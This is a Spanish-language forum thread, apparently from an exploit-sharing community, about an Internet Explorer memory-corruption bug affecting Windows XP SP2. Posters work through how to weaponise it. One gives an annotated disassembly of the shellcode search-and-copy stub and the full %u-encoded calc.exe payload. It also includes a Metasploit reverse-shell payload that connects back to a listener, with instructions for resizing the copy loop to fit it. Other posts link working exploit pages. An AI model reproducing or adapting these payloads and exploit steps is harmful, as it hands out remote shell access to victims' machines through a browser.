Ok, antes que nada quiero especificar algunos requisitos para que funcione el bug.

Por algun motivo extraño en Windows 2000 ya no funciona, mas bien, en algunos, porque he probado en otra maquina y si ha funcionado.

Por lo tanto Windows XP SP2 aun es vulnerable, y no parece haber intensiones de hacer algo al respecto hasta que salga algun SP o un HotFix.

Hoy he descargado el Windows Update, y no hay ningun parche para esta vulnerabilidad, asi que aun estoy investigando porque diablos ya no funciona en Win2000.

El shellcode que publicaron, el PoC esta comprimido.. logicamente no podras verlo asi como asi, sinembargo no necesitas saber que es lo que hace.. solo hay que cambiar el contenido, yo he intentado colocar el shellcode de la vulnerabilidad de XMLHTTP, y me ha alertado mi firewall, asi que supongo que funcionó.

Ahora que si quieren aprender a hacer shellcodes, pues aprendan xD, por ahi vi un texto de Gospel muy bueno.

Saludos.

Obe si que funciona el cmd..
Saludos!

Creo que el problema es que solo funciona para shellcodes de un determinado tamaño.. Si a la shellcode que ejecuta calc.exe le metes 4 nops (%u9090%u9090) sigue funcionando, pero en el momento que añades otro más, ya no funciona..

¿Alguien más puede probar esto?

Todas las shellcodes que tengo sobrepasan el tamaño máximo y por eso no funcionan..

Bueno, primero de todo... hola a todos, pues este es mi primer post, después de leer y leer y leer.... e intentar aprender. Bueno, al tema: He logrado poner una reverse shell usando este exploit. El truco consiste en modificar la parte de código donde se busca y copia la shell a un área de memoria más estable. Explico los pasos como lo he hecho yo, comentándolo, a ver que os parece...

-Desensamblo el código de "busca y copia"

00000000   90                     NOP
00000001   90                     NOP
00000002   90                     NOP
00000003   BA 42414241         MOV EDX,41424142
00000008   81F2 11111111       XOR EDX,11111111   <--- EDX=50535053, osea... las iniciales de Stuart Pearson (descubridor del bug) y que nos servirán para encontrar la shell en memoria.
0000000E   90                  NOP
0000000F   41                     INC ECX      <-- Bucle para buscar la ubicación de una de las copias de la shell
00000010   3911                CMP DWORD PTR DS:[ECX],EDX
00000012  ^75 FA               JNZ SHORT 0000000E
00000014   90                     NOP         <-- A partir de aki tenemos ubicada la shell en la dirección que tenemos en ECX
00000015   90                     NOP
00000016   8BF1                MOV ESI,ECX      
00000018   8BF8                MOV EDI,EAX      
0000001A   57                  PUSH EDI   
0000001B   90                  NOP
0000001C   33C9                XOR ECX,ECX
0000001E   66:B9 2D00          MOV CX,2D      <--- PUNTO CLAVE!, esta es la cantidad de datos que vamos a copiar a la zona estable (ESTO ES LO QUE HAY QUE MODIFICAR)
00000022   F3:A5               REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>   <--- Efectúa la copia a la zona estable
00000024   90                     NOP
00000025   90                     NOP
00000026   5F                     POP EDI
00000027   90                    NOP
00000028   FFE7                JMP EDI   <-- ejecuta la shell situada en la zona estable

- Fijándome en la shell que ejecuta el calc.exe...

"%u5053%u5053%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +
"%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +
"%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +
"%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +
"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +
"%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +
"%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +
"%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +
"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +
"%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" +
"%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +
"%uCC4A%uD0FF")

Veo que comienza con las iniciales, para marcar el comienzo, y algunos NOP (90). El tamaño podemos ver que es de 90 words, o lo que es lo mismo 90 / 2 = 45... 45 en hexadecimal es 2D (la cantidad de datos que se copian a la zona estable. Pues bien... con todo esto, substituyo el calc por una reverse (concretamente la reverse shell del metasploit framework apuntando a mi dirección interna (lo estoy probando con un apache local) 192.168.0.2, puerto 4321 (donde dejo escuchando el netcat) y codificación por defecto... creo que utiliza Pex. He añadido tambien un par de nops justo detrás de las iniciales de Stuart para que mida exactamente 160 words:

"%u5053%u5053%u9090%u9090%uc929%ue983%ud9b8%ud9ee"
+"%u2474%u5bf4"
+"%u7381%u3113"
+"%u9a6e%u834b%ufceb%uf4e2%u04cd%u0671%u97d9%ub465"
+"%u0ece%u2711%u4a15%u0e11%ue50d%u4ee6%u6f49%uc075"
+"%u767e%u1411%u6f11%u0271%u5aba%u4a11%u5fdf%ud25a"
+"%uea9d%u3f5a%uaf36%u4650%uac30%ubf71%u3a0a%u63be"
+"%u8b44%u1411%u6f15%u2d71%u62ba%uc0d1%u726e%ua09b"
+"%u4232%uc211%u4a5d%u2a86%u5ff2%u2f41%u2dba%uc0aa"
+"%u6271%u3b11%uc32d%u0b11%u3039%uc5f2%u607f%u1b76"
+"%ub8ce%u18fc%u0657%u79a9%u1959%u79e9%u3a6e%u9b65"       
+"%ua559%ub777%u3e0a%u9d65%ue76e%u2d7f%u83b0%u4992"
+"%u0464%ub498%u06e1%u4243%uc3c4%ub4cd%u3de7%u18c9"
+"%u2d62%u08c9%u9162%u234a%uc6f1%u499a%u0657%uaa8a"
+"%u3d57%uaa13%u06a4%ub276%u0e9b%ub4cd%u04e7%u1a8a"
+"%u9164%u2d4a%u0a5b%u23fc%u0352%u1bf0%u4768%uc256"
+"%u04d6%uc2de%u5fd3%ub85a%ufb9b%ub613%u2ccf%ub5b7"
+"%u4273%u3117%uc509%ue031%u1c59%uf864%u9127%u63ef"
+"%ub8ce%u1cc1%u3f63%u1acb%u6f5b%u1acb%u3f64%u9b65"
+"%uc359%u4e43%u3dff%u9d65%u915b%u7c65%ubece%uacf2"
+"%ua848%ub4e3%u6a44%u9d65%u19ce%ub466%u06e1%uc16a"
+"%u3135%ub4c9%u91e7%u4b4a"

- La reverse mide exactamente 160 words, o lo que es lo mismo 160 / 2 = 80... 50 en hexadecimal. Por lo tanto, debemos modificar el "punto clave" por un bonito MOV CX, 50 (directamente el 2d de la última linea de prep_shellcode lo cambio por 50 y yastá).

P.D: estaría bien poner un LEAVE o algo que cierre el programa, como en el de la calculadora, pq si no se queda abierto y colgado el explorer. De todas formas aunque lo cierres manualmente (via Ctrl+Alt+Supr) el proceso de la shell no muere XDDD, así que...

P.D2: es mi primer post... no sé si me explico bien o está bien redactado o lo que sea... para cualquier cosa criticad todo lo que querais

a working exploit:

adv648.php


fillmemadv648.htm

via governmentsecurity.org

how do you customize it?

Ya ha parcheado el señor Gates sus Explorers, solamente ha tardado 1 mes ahora la pregunta es, ¿q ha estropeado al "arreglar" esto?